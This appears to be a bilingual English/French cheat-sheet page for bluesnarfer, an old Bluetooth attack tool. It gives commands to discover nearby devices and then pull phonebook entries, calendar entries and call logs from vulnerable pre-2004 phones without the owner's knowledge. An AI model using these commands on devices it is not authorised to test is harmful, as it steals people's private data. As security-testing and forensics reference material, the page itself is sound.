bluesnarfer

Outil d'attaque par Bluetooth snarfing. Exploite la vulnérabilité BlueSnarfing des anciens appareils Bluetooth pour voler contacts du répertoire, entrées d'agenda et autres données à l'insu de l'utilisateur. Bluetooth snarfing attack tool. Exploits BlueSnarfing vulnerability in older Bluetooth devices to steal phonebook contacts, calendar entries, and other data without user awareness.

↗ https://github.com/Pkhex/bluesnarfer

Overview

Bluesnarfer exploits the BlueSnarfing vulnerability — a flaw in early Bluetooth implementations that allows unauthorized OBEX access to device data. Vulnerable devices (mainly pre-2004 phones) expose phonebooks, calendar, and messages without authentication.

Basic Usage

Connect and get phonebook

bluesnarfer -b 00:11:22:33:44:55 -r 1-100

Get specific phonebook entries

bluesnarfer -b 00:11:22:33:44:55 -f pb -r 1-50

Get calendar

bluesnarfer -b 00:11:22:33:44:55 -f cal

Get all available information

bluesnarfer -b 00:11:22:33:44:55 -f all

Available Data

Phonebook entries

bluesnarfer -b TARGET_MAC -f pb -r 1-200

Calendar entries

bluesnarfer -b TARGET_MAC -f cal
bluesnarfer -b TARGET_MAC -f cch  # Missed calls
bluesnarfer -b TARGET_MAC -f ich  # Incoming calls
bluesnarfer -b TARGET_MAC -f och  # Outgoing calls

Options

-b MAC      Target Bluetooth MAC address
-f TYPE     File type: pb (phonebook), cal, all, cch, ich, och
-r START-END Range of entries to retrieve
-C CHAN     RFCOMM channel (default: auto)
-i IFACE    Bluetooth interface (default: hci0)

Understanding BlueSnarfing

# BlueSnarfing affects:
# Pre-2004 Bluetooth phones
# Devices with OBEX Push/Pull without authentication
# Affected vendors: Nokia, Sony Ericsson, some Samsung/Motorola

# Modern devices (post-2004 firmware updates) are NOT vulnerable
# This is primarily a historical/legacy device attack

# Similar attacks:
# Bluebugging  — takes over phone functions
# Bluejacking  — sends unsolicited messages

Discovery First

Discover nearby Bluetooth devices

hcitool scan

Get device info before attacking

hcitool info 00:11:22:33:44:55

Check Bluetooth class

btscanner -s 00:11:22:33:44:55

→ Device class 0x5A0204 = Smartphone

Tips

  • BlueSnarfing affects very old devices — modern smartphones are not vulnerable
  • Primary value today: legacy device forensics and old hardware security testing
  • Use btscanner first to identify device type and manufacturer
  • Channel auto-detection usually works; manually specify with -C if it fails
  • Document findings thoroughly — access to personal data has legal implications
Help / Man page
bluesnarfer [options]

-b MAC      Target Bluetooth MAC address (required)
-f TYPE     Data type: pb, cal, all, cch, ich, och
-r N-M      Entry range (e.g., 1-100)
-C N        RFCOMM channel
-i IFACE    Bluetooth interface

Vue d’ensemble

Bluesnarfer exploite la vulnérabilité BlueSnarfing, une faille des premières implémentations Bluetooth qui autorise un accès OBEX non autorisé aux données de l’appareil. Les appareils vulnérables (principalement les téléphones d’avant 2004) exposent répertoire, agenda et messages sans authentification.

Utilisation de base

# Se connecter et récupérer le répertoire
bluesnarfer -b 00:11:22:33:44:55 -r 1-100

# Récupérer des entrées de répertoire spécifiques
bluesnarfer -b 00:11:22:33:44:55 -f pb -r 1-50

# Récupérer l'agenda
bluesnarfer -b 00:11:22:33:44:55 -f cal

# Récupérer toutes les informations disponibles
bluesnarfer -b 00:11:22:33:44:55 -f all

Données disponibles

# Entrées du répertoire
bluesnarfer -b TARGET_MAC -f pb -r 1-200

# Entrées de l'agenda
bluesnarfer -b TARGET_MAC -f cal

bluesnarfer -b TARGET_MAC -f cch  # Appels manqués
bluesnarfer -b TARGET_MAC -f ich  # Appels entrants
bluesnarfer -b TARGET_MAC -f och  # Appels sortants

Options

-b MAC      Target Bluetooth MAC address
-f TYPE     File type: pb (phonebook), cal, all, cch, ich, och
-r START-END Range of entries to retrieve
-C CHAN     RFCOMM channel (default: auto)
-i IFACE    Bluetooth interface (default: hci0)

Comprendre le BlueSnarfing

# Le BlueSnarfing affecte :
# Les téléphones Bluetooth d'avant 2004
# Les appareils avec OBEX Push/Pull sans authentification
# Constructeurs concernés : Nokia, Sony Ericsson, certains Samsung/Motorola

# Les appareils modernes (mises à jour firmware d'après 2004) ne sont PAS vulnérables
# C'est avant tout une attaque sur du matériel historique/legacy

# Attaques similaires :
# Bluebugging  : prend le contrôle des fonctions du téléphone
# Bluejacking  : envoie des messages non sollicités

D’abord la découverte

# Découvrir les appareils Bluetooth proches
hcitool scan

# Récupérer les infos de l'appareil avant d'attaquer
hcitool info 00:11:22:33:44:55

# Vérifier la classe Bluetooth
btscanner -s 00:11:22:33:44:55
# → Classe d'appareil 0x5A0204 = Smartphone

Conseils

  • Le BlueSnarfing affecte de très vieux appareils : les smartphones modernes ne sont pas vulnérables
  • Intérêt principal aujourd’hui : forensique d’appareils legacy et test de sécurité de vieux matériels
  • Utilisez d’abord btscanner pour identifier le type d’appareil et le constructeur
  • L’auto-détection du canal fonctionne généralement ; spécifiez-le manuellement avec -C en cas d’échec
  • Documentez soigneusement vos découvertes : l’accès à des données personnelles a des implications légales
Aide / Page de manuel
bluesnarfer [options]

-b MAC      Target Bluetooth MAC address (required)
-f TYPE     Data type: pb, cal, all, cch, ich, och
-r N-M      Entry range (e.g., 1-100)
-C N        RFCOMM channel
-i IFACE    Bluetooth interface